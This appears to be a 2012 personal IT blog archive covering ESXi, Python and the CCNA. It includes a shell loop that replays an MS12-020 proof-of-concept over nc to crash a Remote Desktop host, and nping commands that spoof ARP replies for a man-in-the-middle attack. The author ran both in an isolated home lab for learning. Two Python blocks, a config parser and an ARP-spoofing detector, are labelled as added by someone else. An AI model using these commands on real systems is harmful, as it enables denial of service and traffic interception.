Wednesday, July 25, 2012

Nested Virtualization

One of my main goals in migrating from ESXi 3.5 to ESXi 5 was to be able to run 64-bit operating systems in virtual machines, one of them being Windows Server 2008 R2, which would give me the ability to run Hyper-V.  Little did I know that there is an issue that somewhat prevents this.

As most know, Hyper-V is Microsoft's virtualization platform, the successor to Virtual Server.  It is not as robust as VMware even though Microsoft is gaining ground with the new version to be released with Windows Server 2012.  My main goal is to learn at least the basics of Hyper-V.

When I set out to install the Hyper-V role in my Windows Server 2008 R2 VM, I figured I'd be able to add the role and be done with it.  However, when I tried I was greeted with an error message stating that virtualization was not supported by the CPU.

After checking with HWINFO32 that the virtualization instruction set was detected inside the VM, I did some Googling to see if I could find the root cause of the error.  This is when I learned about nested virtualization.

Nested virtualization is essentially running a VM inside of another VM.  This isn't supported natively by VMware, but it can be done with a few hacks.  Here's what I did:

1) Added vhv.allow = "TRUE", which allows Virtualized Hardware Virtualization, to the /etc/vmware/config file on the ESXi 5 host (a host reboot is not required):
2) Added the following CPUID bits to the .vmx file for the VM (/vmfs/volumes/(name of datastore)/(name of VM)):
3) Powered on the VM.
4) Nested VM!

The performance isn't the greatest.  But it works.
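As an added illustration (not code from this post), the following Python parses the key = "value" format shared by /etc/vmware/config and .vmx files so a host can be audited for vhv.allow and each VM for cpuid.* overrides before and after the change above; the sample config text and the cpuid mask value are constructed placeholders.

```python
import re

# Constructed samples of the VMware key = "value" format; not copied from any
# real host, and the cpuid mask value is a placeholder, not a real mask.
SAMPLE_HOST_CONFIG = '''libdir = "/usr/lib/vmware"
authd.proxy.vim = "vmware-hostd:hostd-vmdb"
vhv.allow = "TRUE"
'''
SAMPLE_VMX = '''guestOS = "windows7srv-64"
cpuid.1.ecx = "PLACEHOLDER-MASK"
'''

# keys may contain dots and colons (e.g. scsi0:0.fileName)
_LINE_RE = re.compile(r'^\s*([A-Za-z0-9_.:]+)\s*=\s*"(.*)"\s*$')


def parse_vmware_config(text):
    """Parse key = "value" lines into a dict; blanks and # comments skipped."""
    settings = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith('#'):
            continue
        m = _LINE_RE.match(line)
        if m:
            settings[m.group(1)] = m.group(2)   # a repeated key keeps its last value
    return settings


def nested_virt_enabled(host_config_text):
    """True when vhv.allow (virtualized hardware virtualization) is TRUE."""
    value = parse_vmware_config(host_config_text).get('vhv.allow', 'FALSE')
    return value.strip().upper() == 'TRUE'


def set_key(config_text, key, value):
    """Replace the existing line for key or append one; applying twice changes nothing."""
    lines = config_text.splitlines()
    new_line = f'{key} = "{value}"'
    for i, line in enumerate(lines):
        m = _LINE_RE.match(line)
        if m and m.group(1) == key:
            lines[i] = new_line
            break
    else:
        lines.append(new_line)
    return '\n'.join(lines) + '\n'


def cpuid_overrides(vmx_text):
    """Sorted cpuid.* keys a .vmx overrides (the CPUID-bit hack from step 2)."""
    return sorted(k for k in parse_vmware_config(vmx_text) if k.startswith('cpuid.'))
```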

Thanks to the following sites for instructions:
http://thephuck.com/virtualization/installing-windows-server-8-hyper-v-3-in-esxi-5/
http://www.virtuallyghetto.com/2011/07/how-to-enable-support-for-nested-64bit.html


Sunday, July 22, 2012

MS12-020 Exploit

I'm still relatively new to security and lately I've been trying out various exploits, one of them being the MS12-020 vulnerability in Remote Desktop.

The details of the vulnerability can be found here and the proof of concept code that can be used to exploit the vulnerability can be found here.

To test the proof-of-concept code I used a VM running Windows 7 Enterprise with no updates and a VM running Debian Linux 6 x64.

I wrote a short shell script to execute the exploit multiple times until the target machine crashed.

#!/bin/sh
while true;
do
        echo `nc <SERVER IP> 3389 < termdd_1.dat`
done

Running the exploit:

Crashing the box:

It's a "script kiddie" exploit.  But everyone has to start somewhere. :)

Wednesday, July 18, 2012

Man-In-The-Middle With nping

nmap is known as the world's best port scanner.  However, there are a few lesser-known tools that are installed with nmap.  They are: ncat (an improved version of netcat), nping (a packet crafter), and ndiff (like the Unix diff, but for nmap scans).

This post will focus on simulating a LAN based Man-In-The-Middle (MITM) attack using nping.

A LAN based MITM attack exploits a well known security flaw in the Address Resolution Protocol, or ARP.  ARP is used to map a layer 3 IP address to a layer 2 MAC address so that hosts on the same network can transmit traffic to each other.

Unlike DNS, ARP accepts updates at any time and can't be configured to only accept secured updates.  This means that one can send a spoofed ARP packet mapping the IP address of another host to the MAC address of their own host, thus causing all communication intended for the other host's IP to be sent to the spoofer's host.

A MITM attack sends spoofed ARP packets to two different hosts, each carrying the other host's IP but the attacker's MAC address.  For example:

Host A ------------------ Attacker ------------------ Host B
1.1.1.1                   MAC : X                     2.2.2.2
MAC : A                                               MAC : B

Attacker sends an ARP packet to Host A with its own MAC address (X) and Host B's IP address (2.2.2.2).  Attacker also sends an ARP packet to Host B with its own MAC address and Host A's IP address (1.1.1.1).  This populates the ARP cache of each host with the IP address of the other, but the MAC address associated with that IP is Attacker's.  This causes all traffic sent between the two hosts to pass through Attacker, hence the term "Man-in-the-middle".

MITM attacks allow the attacker to intercept or sniff the traffic between two hosts.  The security implications of this are obvious, and the attack is particularly dangerous on wireless networks.

nping is a tool that allows one to generate custom packets.  It allows one to specify the source IP address, destination IP address, source MAC, destination MAC and many other TCP/IP, Ethernet and UDP features.

I used nping in my ESXi environment to simulate a MITM attack.  This is how I did it:

Hosts:
Teal (Debian 6.0) - 10.0.0.2
blue (Debian 6.0) - 10.0.0.1 - attacker
DC-03 (Windows Server 2008 R2) - 10.0.0.3

These VMs were connected to a vswitch on a private network segmented from my home network.

1) Ran nping from blue against DC-03 and Teal specifying blue's MAC address as the source for ARPs for DC-03 and Teal respectively:

Command sent to TEAL:
nping --arp-type arp-reply --source-mac 00:0c:29:43:ec:da --source-ip 10.0.0.3 -c 9999 10.0.0.2

Command sent to DC-03:
nping --arp-type arp-reply --source-mac 00:0c:29:43:ec:da --source-ip 10.0.0.2 -c 9999 10.0.0.3

-c 9999 tells nping to send the ARP reply 9999 times.

Here's what it looked like in action:

nping to Teal:

nping to DC-03:

Here are the resulting ARP tables on each host:

Teal:
DC-03:

I then ran ncat in listening mode on Teal to simulate a web server and then installed Apache.  I installed IIS 7 on DC-03.  I tested connecting from one host to the other while using tcpdump on blue to monitor the traffic.  The results are below:

Using Firefox on DC-03 to connect to Teal:

Using Lynx on Teal to connect to DC-03:

Using Telnet on DC-03 to connect to the ncat listener on Teal and then connecting using IE9 (odd results):

tcpdump on blue of the DC-03 to Teal session:

tcpdump on blue of the Teal to DC-03 session:

As you can see, I was able to monitor the traffic going between Teal and DC-03 on blue using tcpdump.

There are much better tools for performing LAN-based MITM attacks (ettercap, Cain and Abel).  But utilizing packet crafters is a good way to get an underlying understanding of how things work.
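The following Python detector is an added example, not part of the post; it reads tcpdump-style ARP lines for the scenario above and flags exactly what the two nping commands produce: replies nobody requested, an IP whose MAC changes, and one MAC (blue's 00:0c:29:43:ec:da) answering for both 10.0.0.2 and 10.0.0.3.  The capture text is constructed, and Teal's real MAC in it is a made-up placeholder.

```python
import re
from collections import defaultdict

# Constructed tcpdump-style ARP lines: one legitimate request/reply pair for
# Teal (10.0.0.2, placeholder MAC 00:0c:29:11:22:33), then the spoofed replies
# blue sends with the nping commands above (both IPs claimed by blue's MAC).
SAMPLE_CAPTURE = """\
12:00:00.000100 ARP, Request who-has 10.0.0.2 tell 10.0.0.3, length 28
12:00:00.000200 ARP, Reply 10.0.0.2 is-at 00:0c:29:11:22:33, length 28
12:00:05.000000 ARP, Reply 10.0.0.3 is-at 00:0c:29:43:ec:da, length 28
12:00:05.000100 ARP, Reply 10.0.0.2 is-at 00:0c:29:43:ec:da, length 28
"""

REQUEST_RE = re.compile(r"ARP, Request who-has ([0-9.]+) tell ([0-9.]+)")
REPLY_RE = re.compile(r"ARP, Reply ([0-9.]+) is-at ([0-9A-Fa-f:]{17})")


def detect_arp_spoofing(capture_text):
    """Scan tcpdump ARP output and return a list of (reason, ip, mac) alerts.
    Three signals: a reply nobody asked for (nping --arp-type arp-reply sends
    these unsolicited), an IP whose MAC changed, and one MAC answering for
    more than one IP."""
    alerts = []
    pending = set()                 # IPs with an outstanding who-has request
    ip_to_mac = {}                  # last MAC seen answering for each IP
    mac_to_ips = defaultdict(set)   # every IP each MAC has claimed
    for line in capture_text.splitlines():
        req = REQUEST_RE.search(line)
        if req:
            pending.add(req.group(1))
            continue
        rep = REPLY_RE.search(line)
        if not rep:
            continue
        ip, mac = rep.group(1), rep.group(2).lower()
        if ip in pending:
            pending.discard(ip)
        else:
            alerts.append(("unsolicited-reply", ip, mac))
        if ip in ip_to_mac and ip_to_mac[ip] != mac:
            alerts.append(("mac-changed", ip, mac))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append(("mac-claims-multiple-ips", ip, mac))
    return alerts
```

On a real host the same logic runs over tcpdump -n -e arp output; the legitimate pair at the top of the sample produces no alert, the two spoofed replies produce four.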

Friday, July 13, 2012

ESXi 5 Build


In 2009 I was a victim of the recession like many people were.

During my time of unemployment I elected to pursue some IT certifications to enhance my skill set.  One of these was the Microsoft Certified IT Professional:  Enterprise Administration, or MCITP: EA for short.

I elected to go the self-study route and used the Microsoft Press Self-Study kit (link to amazon page).  At this point in time Windows Server 2008 R2 had just recently been released so the exam and study materials were based on Windows Server 2008.

I won’t go too in-depth to what the kit contained as that is not the focus of this post.  The important fact is that the kit contained lab exercises that required multiple servers and clients.

Microsoft suggests going the virtualization route by using Virtual PC or Virtual Server, both of which require a valid Windows license.  I elected to use VMware ESXi 3.5 as it is more prevalent in the marketplace now and it is free.

The original machine I used was an off-lease HP tower with a P4 3.4 GHz processor, 4GB RAM and 700GB of hard drive space.  ESXi 3.5 installed after I purchased a SATA controller card that was on the VMware Whitebox HCL (link to site).  The whole build cost me just under $300 Canadian.

Because the P4 is a 32-bit processor, I was unable to use ESXi 4 or run 64-bit VMs.

After almost two years of use, I saw the need to be able to run 64-bit VMs.   

After a bit of research I selected the components for an ESXi 5 white-box build.  VMware extended the HCL for ESXi 5 and I was able to build a box with the following components:

AMD Phenom II X6 2.6 GHz CPU
Asus M4A88T-M (AMD 880G chipset)
12GB DDR3 PC3-10666 RAM
1TB 7200 Hard drive
24x DVD-RW

The build and install went flawlessly.  The only issue I had was with an add-on Realtek 8139A NIC that is supposed to be supported.  When I connected to the host via SSH and ran lspci, it showed up, but ESXi was unable to see it.  So I am just running with the integrated NIC (Realtek 8138) for now.

I added a 500GB hard drive from the old ESXi 3.5 server and expanded the datastore to a total size of 1.5TB.

Instead of re-installing all of my VMs from scratch, I used VMware Converter to move the VMs from the old host to the new one.  It’s sort of like VMotion, but the VMs have to be powered off, and it can’t be done on the fly.  Still, it’s much more efficient than transferring the files via SSH.


After verifying all VMs were working, I upgraded or installed VMware Tools on all the guests that I was currently using.  ESXi 5 has an in-place upgrade for older versions of VMware Tools.


I then proceeded to upgrade the ESXi server to the latest build.

After finding the VMware Infrastructure Update Client was no longer supported in ESXi 5, I proceeded to do a bit of Googling until I found some instructions on how to download and install the latest patches.

After going to VMware’s downloads section and selecting the patch, you have to download it locally to your machine since the version of wget that comes with ESXi 5 doesn’t support https.  After doing so you must scp it to the datastore on the ESXi host.  You then put the host in maintenance mode and run the following command:

esxcli software vib install --maintenance-mode  --depot /vmfs/volumes/datastore1/ESXi500-XXXXXXXXXXXX.zip

Replace the Xs with the patch number.

While in maintenance mode all VMs must be shut down.

If the patch requires a reboot, it will tell you during the installation process.

First Solo Python Script

As a follow-up to the last post, I've been learning Python from various books and have been solely following the exercises in the books themselves, not venturing out on my own until now.

I decided to try writing a simple script that installs nmap 6.01 from source on a Unix/Linux platform.  You can find it here.  The script was just an exercise to see if I could actually get it working.  I may make additions/modifications to it later on.

Learning Python

Over the past year or so I've been learning Python.  I have a Computer Science degree but strayed away from programming.  However, after developing an interest in IT Security I found that it is very beneficial to know how to at least read code let alone write it.

Python is very popular in the Security field and is gaining popularity in the Unix/Linux systems administration field to the point where it is directly competing with Perl.

I've been learning from the following books: Python Programming: An Introduction to Computer Science, Practical Programming: An Introduction to Computer Science Using Python, and Core Python Programming.

In terms of self-study, if you have no background in programming or Computer Science I would recommend starting with Python Programming and moving on to Core Python.  If you have a programming/Computer Science background you can start with Core Python.

Python Programming teaches Computer Science using Python as the language.  Core Python assumes one already has programming experience.  Core Python focuses on the language and then applications using the language.

As for Practical Programming, I found this title to be very poor for self-study; the authors seem to make many assumptions, to the point where they just throw code at you without thorough explanation.

Wednesday, July 11, 2012

Cisco CCNA

I recently passed the ICND2 exam thus completing the Cisco Certified Network Associate (CCNA) certification.

I chose the two exam route since I am relatively new to networking and I wanted to be able to focus on each exam's topic separately.

It took about three months of preparation for the ICND1 exam and another six months for the ICND2 exam.  This is a relatively long time,  but I had other material I was working on and I wanted to make sure that I passed the exams.

As my goal is to obtain a position in IT security, a base knowledge of networking is required.  The CCNA is a recognized certification that will give you a base knowledge in routing, switching, TCP/IP and UDP.  Be forewarned that it covers networking from a Cisco perspective, so the emphasis is on configuring Cisco devices and not networking in general.

A solid understanding of the OSI model, TCP/IP, and UDP is required for security professionals.  Good sources for this material are Wireshark Network Analysis, NMAP Network Scanning, and TCP/IP Guide.  All of these titles I plan on reading myself.

Below are the resources that I used to prepare for the exam:

From Cisco Press:
CCNA 640-802 Official Cert Library
CCNA Flash Cards and Exam Practice Pack
31 Days Before Your CCNA Exam
CCNA Portable Command Guide
CCNA 640-802 Network Simulator

Cisco Packet Tracer 5.3 (do a Google search to find it and various labs)
CBT Nuggets CCNA

The Official Certification Library and the CCNA Flash Cards titles come with practice tests from Boson.  I found these tests to be harder than the actual exam.  This, combined with the 200+ labs that came with the Network Simulator, should be more than enough to pass the exams.  The other titles I used as insurance.

My advice for test takers is to read the books cover to cover and go through the practice material in the appendices on the CDs.  Also learn how to subnet very quickly.  You should be able to subnet in 20 seconds or less.  Many of the problems on the exam require subnetting, even those that aren't specific to subnetting.  Keep doing the Boson exams until you can pass them consistently.  Finally, make sure you spend a significant amount of time doing labs, whether you build a physical lab or use the simulators.  There are questions that aren't simulator questions but ask you about various IOS commands, so make sure you're familiar with them.